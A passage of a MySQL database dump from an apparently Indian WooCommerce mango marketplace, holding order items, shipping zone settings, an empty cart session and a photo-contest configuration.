1'),(1029,103,'vendor_id','28'),(1030,103,'package_qty','1'),(1031,103,'method_slug','flat_rate'),(1032,103,'processing_time','-'),(1033,104,'method_id','wcfmmp_product_shipping_by_zone'),(1034,104,'instance_id','10'),(1035,104,'cost','0.00'),(1036,104,'total_tax','0'),(1037,104,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(1038,104,'Items','Alphonso mango 3kg &times; 1'),(1039,104,'vendor_id','25'),(1040,104,'package_qty','1'),(1041,104,'method_slug','free_shipping'),(1042,104,'processing_time','-'),(1043,101,'_vendor_id','28'),(1044,101,'_wcfmmp_order_item_processed','34'),(1045,102,'_vendor_id','25'),(1046,102,'_wcfmmp_order_item_processed','35'),(1047,105,'_product_id','1194'),(1048,105,'_variation_id','0'),(1049,105,'_qty','1'),(1050,105,'_tax_class',''),(1051,105,'_line_subtotal','999'),(1052,105,'_line_subtotal_tax','0'),(1053,105,'_line_total','999'),(1054,105,'_line_tax','0'),(1055,105,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1056,105,'_ywpo_item_preorder','yes'),(1057,106,'method_id','wcfmmp_product_shipping_by_zone'),(1058,106,'instance_id','10'),(1059,106,'cost','30.00'),(1060,106,'total_tax','0'),(1061,106,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(1062,106,'Items','Alphonso mango 3kg &times; 1'),(1063,106,'vendor_id','25'),(1064,106,'package_qty','1'),(1065,106,'method_slug','flat_rate'),(1066,106,'processing_time','-'),(1067,105,'_vendor_id','25'),(1068,105,'_wcfmmp_order_item_processed','36'),(1069,107,'_product_id','1194'),(1070,107,'_variation_id','0'),(1071,107,'_qty','1'),(1072,107,'_tax_class',''),(1073,107,'_line_subtotal','999'),(1074,107,'_line_subtotal_tax','0'),(1075,107,'_line_total','999'),(1076,107,'_line_tax','0'),(1077,107,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1078,107,'_ywpo_item_preorder','yes'),(1079,108,'method_id','wcfmmp_product_shipping_by_zone'),(1080,108,'instance_id','10'),(1081,108,'cost','30.00'),(1082,108,'total_tax','0'),(1083,108,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(1084,108,'Items','Alphonso mango 3kg &times; 1'),(1085,108,'vendor_id','25'),(1086,108,'package_qty','1'),(1087,108,'method_slug','flat_rate'),(1088,108,'processing_time','1-2 business days'),(1089,107,'_vendor_id','25'),(1090,107,'_wcfmmp_order_item_processed','37'),(1195,121,'_product_id','1786'),(1196,121,'_variation_id','0'),(1197,121,'_qty','1'),(1198,121,'_tax_class',''),(1199,121,'_line_subtotal','21000'),(1200,121,'_line_subtotal_tax','0'),(1201,121,'_line_total','21000'),(1202,121,'_line_tax','0'),(1203,121,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1204,122,'_product_id','1775'),(1205,122,'_variation_id','0'),(1206,122,'_qty','1'),(1207,122,'_tax_class',''),(1208,122,'_line_subtotal','21000'),(1209,122,'_line_subtotal_tax','0'),(1210,122,'_line_total','21000'),(1211,122,'_line_tax','0'),(1212,122,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1213,123,'method_id','free_shipping'),(1214,123,'instance_id','11'),(1215,123,'cost','0.00'),(1216,123,'total_tax','0'),(1217,123,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(1218,123,'Items','cattle &times; 1, abc &times; 1'),(1219,123,'package_qty','2'),(1220,123,'method_slug','free_shipping'),(1221,124,'_product_id','1775'),(1222,124,'_variation_id','0'),(1223,124,'_qty','1'),(1224,124,'_tax_class',''),(1225,124,'_line_subtotal','21000'),(1226,124,'_line_subtotal_tax','0'),(1227,124,'_line_total','21000'),(1228,124,'_line_tax','0'),(1229,124,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1230,125,'method_id','free_shipping'),(1231,125,'instance_id','11'),(1232,125,'cost','0.00'),(1233,125,'total_tax','0'),(1234,125,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(1235,125,'Items','abc &times; 1'),(1236,125,'package_qty','1'),(1237,125,'method_slug','free_shipping'),(1238,126,'_product_id','1775'),(1239,126,'_variation_id','0'),(1240,126,'_qty','1'),(1241,126,'_tax_class',''),(1242,126,'_line_subtotal','21000'),(1243,126,'_line_subtotal_tax','0'),(1244,126,'_line_total','21000'),(1245,126,'_line_tax','0'),(1246,126,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1247,127,'method_id','free_shipping'),(1248,127,'instance_id','11'),(1249,127,'cost','0.00'),(1250,127,'total_tax','0'),(1251,127,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(1252,127,'Items','abc &times; 1'),(1253,127,'package_qty','1'),(1254,127,'method_slug','free_shipping');
/*!40000 ALTER TABLE `wp_woocommerce_order_itemmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_order_items`
--

DROP TABLE IF EXISTS `wp_woocommerce_order_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_order_items` (
  `order_item_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_item_name` text NOT NULL,
  `order_item_type` varchar(200) NOT NULL DEFAULT '',
  `order_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`order_item_id`),
  KEY `order_id` (`order_id`)
) ENGINE=InnoDB AUTO_INCREMENT=128 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_order_items`
--

LOCK TABLES `wp_woocommerce_order_items` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_order_items` DISABLE KEYS */;
INSERT INTO `wp_woocommerce_order_items` VALUES (1,'Badami','line_item',580),(2,'Flat rate','shipping',580),(3,'Badami','line_item',581),(4,'Flat rate','shipping',581),(5,'Kesar','line_item',654),(6,'aaaa','line_item',654),(7,'Free shipping','shipping',654),(8,'Malgova','line_item',998),(9,'Free shipping','shipping',998),(10,'test mango','line_item',1002),(11,'Flat rate','shipping',1002),(12,'Hapus','line_item',1005),(13,'test mango 7','line_item',1005),(14,'Flat rate','shipping',1005),(15,'Flat rate','shipping',1005),(16,'test mango 7','line_item',1008),(17,'aaaa','line_item',1008),(18,'Flat rate','shipping',1008),(19,'Flat rate','shipping',1008),(20,'Banginapalli','line_item',1012),(21,'test mango','line_item',1012),(22,'Free shipping','shipping',1012),(23,'Free shipping','shipping',1012),(24,'Banginapalli','line_item',1013),(25,'Flat rate','shipping',1013),(40,'Chausa','line_item',1016),(41,'test mango 2','line_item',1016),(42,'test mango 7','line_item',1016),(43,'test mango','line_item',1016),(44,'Flat rate','shipping',1016),(45,'Free shipping','shipping',1016),(46,'Free shipping','shipping',1016),(47,'test mango','line_item',1017),(48,'test mango 7','line_item',1017),(49,'Himasagar','line_item',1017),(50,'Free shipping','shipping',1017),(51,'Free shipping','shipping',1017),(52,'Free shipping','shipping',1017),(53,'test mango 7','line_item',1018),(54,'Free shipping','shipping',1018),(55,'mangggoo','line_item',1022),(56,'Pairi','line_item',1022),(57,'Flat rate','shipping',1022),(58,'Free shipping','shipping',1022),(59,'alphonsa','line_item',1023),(60,'mangggoo','line_item',1023),(61,'Flat rate','shipping',1023),(62,'Flat rate','shipping',1023),(63,'testmango','line_item',1195),(64,'Mango Solapur Pickle','line_item',1195),(65,'Flat rate','shipping',1195),(66,'Flat rate','shipping',1195),(67,'Mango Solapur Pickle','line_item',1196),(68,'Mango hing UP style pickle - 250GM','line_item',1196),(69,'testmango','line_item',1196),(70,'shipping rate','shipping',1196),(71,'shipping rate','shipping',1196),(72,'Appemidi 5kg','line_item',1197),(73,'shipping rate','shipping',1197),(74,'Chhunda or gujarati sweet mango pickle - 250GM','line_item',1198),(75,'Frooti Mango Drink Plastic Bottle - 600ml','line_item',1198),(76,'shipping rate','shipping',1198),(77,'Chhunda or gujarati sweet mango pickle - 250GM','line_item',1199),(78,'testmango','line_item',1199),(79,'shipping rate','shipping',1199),(80,'shipping rate','shipping',1199),(81,'testmango','line_item',1200),(82,'shipping rate','shipping',1200),(83,'testmango','line_item',1201),(84,'Mango Solapur Pickle','line_item',1201),(85,'Free Shipping','shipping',1201),(86,'Flat Rate','shipping',1201),(91,'testmango','line_item',1202),(92,'Banginapalli Mango 5kg','line_item',1202),(93,'Free Shipping','shipping',1202),(94,'Flat Rate','shipping',1202),(99,'mango','line_item',1277),(100,'Flat Rate','shipping',1277),(101,'mango','line_item',1278),(102,'Alphonso mango 3kg','line_item',1278),(103,'Flat Rate','shipping',1278),(104,'Free Shipping','shipping',1278),(105,'Alphonso mango 3kg','line_item',1279),(106,'Flat Rate','shipping',1279),(107,'Alphonso mango 3kg','line_item',1280),(108,'Flat Rate','shipping',1280),(121,'cattle','line_item',1988),(122,'abc','line_item',1988),(123,'Free shipping','shipping',1988),(124,'abc','line_item',1989),(125,'Free shipping','shipping',1989),(126,'abc','line_item',2032),(127,'Free shipping','shipping',2032);
/*!40000 ALTER TABLE `wp_woocommerce_order_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_payment_tokenmeta`
--

DROP TABLE IF EXISTS `wp_woocommerce_payment_tokenmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_payment_tokenmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `payment_token_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `payment_token_id` (`payment_token_id`),
  KEY `meta_key` (`meta_key`(32))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_payment_tokenmeta`
--

LOCK TABLES `wp_woocommerce_payment_tokenmeta` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_payment_tokenmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_payment_tokenmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_payment_tokens`
--

DROP TABLE IF EXISTS `wp_woocommerce_payment_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_payment_tokens` (
  `token_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `gateway_id` varchar(200) NOT NULL,
  `token` text NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `type` varchar(200) NOT NULL,
  `is_default` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`token_id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_payment_tokens`
--

LOCK TABLES `wp_woocommerce_payment_tokens` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_payment_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_payment_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_sessions`
--

DROP TABLE IF EXISTS `wp_woocommerce_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_sessions` (
  `session_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `session_key` char(32) NOT NULL,
  `session_value` longtext NOT NULL,
  `session_expiry` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`session_id`),
  UNIQUE KEY `session_key` (`session_key`)
) ENGINE=InnoDB AUTO_INCREMENT=2593 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_sessions`
--

LOCK TABLES `wp_woocommerce_sessions` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_sessions` DISABLE KEYS */;
INSERT INTO `wp_woocommerce_sessions` VALUES (2592,'t_35bca67acdf3842e13f98755421ef5','a:9:{s:4:\"cart\";s:6:\"a:0:{}\";s:11:\"cart_totals\";s:367:\"a:15:{s:8:\"subtotal\";i:0;s:12:\"subtotal_tax\";i:0;s:14:\"shipping_total\";i:0;s:12:\"shipping_tax\";i:0;s:14:\"shipping_taxes\";a:0:{}s:14:\"discount_total\";i:0;s:12:\"discount_tax\";i:0;s:19:\"cart_contents_total\";i:0;s:17:\"cart_contents_tax\";i:0;s:19:\"cart_contents_taxes\";a:0:{}s:9:\"fee_total\";i:0;s:7:\"fee_tax\";i:0;s:9:\"fee_taxes\";a:0:{}s:5:\"total\";i:0;s:9:\"total_tax\";i:0;}\";s:15:\"applied_coupons\";s:6:\"a:0:{}\";s:22:\"coupon_discount_totals\";s:6:\"a:0:{}\";s:26:\"coupon_discount_tax_totals\";s:6:\"a:0:{}\";s:21:\"removed_cart_contents\";s:6:\"a:0:{}\";s:15:\"wcfm_membership\";i:-1;s:33:\"wcfm_membership_free_registration\";i:-1;s:8:\"customer\";s:742:\"a:28:{s:2:\"id\";s:1:\"0\";s:13:\"date_modified\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:7:\"company\";s:0:\"\";s:5:\"phone\";s:0:\"\";s:5:\"email\";s:0:\"\";s:7:\"address\";s:0:\"\";s:9:\"address_1\";s:0:\"\";s:9:\"address_2\";s:0:\"\";s:4:\"city\";s:0:\"\";s:5:\"state\";s:2:\"KA\";s:8:\"postcode\";s:0:\"\";s:7:\"country\";s:2:\"IN\";s:19:\"shipping_first_name\";s:0:\"\";s:18:\"shipping_last_name\";s:0:\"\";s:16:\"shipping_company\";s:0:\"\";s:14:\"shipping_phone\";s:0:\"\";s:16:\"shipping_address\";s:0:\"\";s:18:\"shipping_address_1\";s:0:\"\";s:18:\"shipping_address_2\";s:0:\"\";s:13:\"shipping_city\";s:0:\"\";s:14:\"shipping_state\";s:2:\"KA\";s:17:\"shipping_postcode\";s:0:\"\";s:16:\"shipping_country\";s:2:\"IN\";s:13:\"is_vat_exempt\";s:0:\"\";s:19:\"calculated_shipping\";s:0:\"\";s:9:\"meta_data\";a:0:{}}\";}',1747597072);
/*!40000 ALTER TABLE `wp_woocommerce_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_shipping_zone_locations`
--

DROP TABLE IF EXISTS `wp_woocommerce_shipping_zone_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_shipping_zone_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `zone_id` bigint(20) unsigned NOT NULL,
  `location_code` varchar(200) NOT NULL,
  `location_type` varchar(40) NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `location_id` (`location_id`),
  KEY `location_type_code` (`location_type`(10),`location_code`(20)),
  KEY `zone_id` (`zone_id`)
) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_shipping_zone_locations`
--

LOCK TABLES `wp_woocommerce_shipping_zone_locations` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zone_locations` DISABLE KEYS */;
INSERT INTO `wp_woocommerce_shipping_zone_locations` VALUES (15,3,'IN:KA','state'),(16,4,'IN:TN','state');
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zone_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_shipping_zone_methods`
--

DROP TABLE IF EXISTS `wp_woocommerce_shipping_zone_methods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_shipping_zone_methods` (
  `zone_id` bigint(20) unsigned NOT NULL,
  `instance_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `method_id` varchar(200) NOT NULL,
  `method_order` bigint(20) unsigned NOT NULL,
  `is_enabled` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`instance_id`)
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_shipping_zone_methods`
--

LOCK TABLES `wp_woocommerce_shipping_zone_methods` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zone_methods` DISABLE KEYS */;
INSERT INTO `wp_woocommerce_shipping_zone_methods` VALUES (3,6,'flexible_shipping_single',1,1),(3,9,'acotrs_shipping',4,1),(3,10,'wcfmmp_product_shipping_by_zone',5,1),(3,11,'free_shipping',4,1);
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zone_methods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_shipping_zones`
--

DROP TABLE IF EXISTS `wp_woocommerce_shipping_zones`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_shipping_zones` (
  `zone_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `zone_name` varchar(200) NOT NULL,
  `zone_order` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`zone_id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_shipping_zones`
--

LOCK TABLES `wp_woocommerce_shipping_zones` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zones` DISABLE KEYS */;
INSERT INTO `wp_woocommerce_shipping_zones` VALUES (3,'india',0),(4,'india',0);
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zones` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_tax_rate_locations`
--

DROP TABLE IF EXISTS `wp_woocommerce_tax_rate_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_tax_rate_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `location_code` varchar(200) NOT NULL,
  `tax_rate_id` bigint(20) unsigned NOT NULL,
  `location_type` varchar(40) NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `tax_rate_id` (`tax_rate_id`),
  KEY `location_type_code` (`location_type`(10),`location_code`(20))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_tax_rate_locations`
--

LOCK TABLES `wp_woocommerce_tax_rate_locations` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_tax_rate_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_tax_rate_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_tax_rates`
--

DROP TABLE IF EXISTS `wp_woocommerce_tax_rates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_woocommerce_tax_rates` (
  `tax_rate_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `tax_rate_country` varchar(2) NOT NULL DEFAULT '',
  `tax_rate_state` varchar(200) NOT NULL DEFAULT '',
  `tax_rate` varchar(8) NOT NULL DEFAULT '',
  `tax_rate_name` varchar(200) NOT NULL DEFAULT '',
  `tax_rate_priority` bigint(20) unsigned NOT NULL,
  `tax_rate_compound` int(1) NOT NULL DEFAULT 0,
  `tax_rate_shipping` int(1) NOT NULL DEFAULT 1,
  `tax_rate_order` bigint(20) unsigned NOT NULL,
  `tax_rate_class` varchar(200) NOT NULL DEFAULT '',
  PRIMARY KEY (`tax_rate_id`),
  KEY `tax_rate_country` (`tax_rate_country`),
  KEY `tax_rate_state` (`tax_rate_state`(2)),
  KEY `tax_rate_class` (`tax_rate_class`(10)),
  KEY `tax_rate_priority` (`tax_rate_priority`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_tax_rates`
--

LOCK TABLES `wp_woocommerce_tax_rates` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_tax_rates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_tax_rates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpc_contests`
--

DROP TABLE IF EXISTS `wp_wpc_contests`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpc_contests` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(500) DEFAULT NULL,
  `fields` longtext DEFAULT NULL,
  `additional_fields` longtext DEFAULT NULL,
  `phase_two_voting_creteria` longtext DEFAULT NULL,
  `contest_creation_time` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpc_contests`
--

LOCK TABLES `wp_wpc_contests` WRITE;
/*!40000 ALTER TABLE `wp_wpc_contests` DISABLE KEYS */;
INSERT INTO `wp_wpc_contests` VALUES (1,'Photo Contest','a:18:{s:14:\"contest_on_off\";s:2:\"on\";s:13:\"max_num_files\";s:1:\"1\";s:10:\"file_types\";s:7:\"jpg,pdf\";s:11:\"upload_cost\";s:2:\"10\";s:13:\"maximum_entry\";i:50;s:11:\"title_label\";s:29:\"Give A Caption For Your Image\";s:14:\"category_label\";s:10:\"Categories\";s:16:\"category_options\";a:2:{i:0;s:15:\"theme on magoes\";i:1;s:24:\" theme on mango products\";}s:17:\"description_label\";s:11:\"Description\";s:12:\"upload_label\";s:20:\"Max Upload Size 10MB\";s:11:\"upload_type\";s:0:\"\";s:11:\"tos_page_id\";s:3:\"564\";s:13:\"current_phase\";i:2;s:14:\"who_can_upload\";s:17:\"all_loggedin_user\";s:14:\"phsae_one_vote\";s:0:\"\";s:18:\"phase_one_oparetor\";s:0:\"\";s:20:\"phase_one_vote_count\";s:1:\"2\";s:12:\"contest_type\";s:4:\"free\";}',NULL,'a:2:{s:6:\"grades\";a:3:{i:0;s:16:\"Need Improvement\";i:1;s:4:\"Good\";i:2;s:13:\"Exceptational\";}s:8:\"criteria\";a:4:{i:0;s:7:\"Subject\";i:1;s:11:\"Composition\";i:2;s:13:\"Light/Exposer\";i:3;s:18:\"Impact/Originality\";}}','2022-02-08 06:08:05');
/*!40000 ALTER TABLE `wp_wpc_contests` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpc_entry`
--

DROP TABLE IF EXISTS `wp_wpc_entry`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpc_entry` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `contest_id` int(11) DEFAULT NULL,
  `user_id` int(11) DEFAULT NULL,
  `entry_meta` longtext DEFAULT NULL,
  `additional_fields` longtext DEFAULT NULL,
  `payment_id` longtext DEFAULT NULL,
  `payment` tinyint(1) NOT NULL,
  `entry_time` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpc_entry`
--

LOCK TABLES `wp_wpc_entry` WRITE;
/*!40000 ALTER TABLE `wp_wpc_entry` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpc_entry` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpc_phase_one_votiong`
--

DROP TABLE IF EXISTS `wp_wpc_phase_one_votiong`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpc_phase_one_votiong` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `entry_id` int(11) DEFAULT NULL,
  `judge_id` int(11) DEFAULT NULL,
  `vote` varchar(10) DEFAULT NULL,
  `voting_time` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpc_phase_one_votiong`
--

LOCK TABLES `wp_wpc_phase_one_votiong` WRITE;
/*!40000 ALTER TABLE `wp_wpc_phase_one_votiong` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpc_phase_one_votiong` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpc_phase_two_votiong`
--

DROP TABLE IF EXISTS `wp_wpc_phase_two_votiong`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpc_phase_two_votiong` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `entry_id` int(11) DEFAULT NULL,
  `judge_id` int(11) DEFAULT NULL,
  `vote` int(10) DEFAULT NULL,
  `edit_reason` longtext DEFAULT NULL,
  `voting_time` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpc_phase_two_votiong`
--

LOCK TABLES `wp_wpc_phase_two_votiong` WRITE;
/*!40000 ALTER TABLE `wp_wpc_phase_two_votiong` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpc_phase_two_votiong` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpfd_statistics`
--

DROP TABLE IF EXISTS `wp_wpfd_statistics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpfd_statistics` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `related_id` varchar(200) NOT NULL,
  `type` varchar(200) NOT NULL,
  `date` date NOT NULL DEFAULT '0000-00-00',
  `count` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpfd_statistics`
--

LOCK TABLES `wp_wpfd_statistics` WRITE;
/*!40000 ALTER TABLE `wp_wpfd_statistics` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpfd_statistics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpfm_backup`
--

DROP TABLE IF EXISTS `wp_wpfm_backup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpfm_backup` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `backup_name` text DEFAULT NULL,
  `backup_date` text DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpfm_backup`
--

LOCK TABLES `wp_wpfm_backup` WRITE;
/*!40000 ALTER TABLE `wp_wpfm_backup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpfm_backup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpforms_logs`
--

DROP TABLE IF EXISTS `wp_wpforms_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpforms_logs` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `message` longtext NOT NULL,
  `types` varchar(255) NOT NULL,
  `create_at` datetime NOT NULL,
  `form_id` bigint(20) DEFAULT NULL,
  `entry_id` bigint(20) DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=26 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpforms_logs`
--

LOCK TABLES `wp_wpforms_logs` WRITE;
/*!40000 ALTER TABLE `wp_wpforms_logs` DISABLE KEYS */;
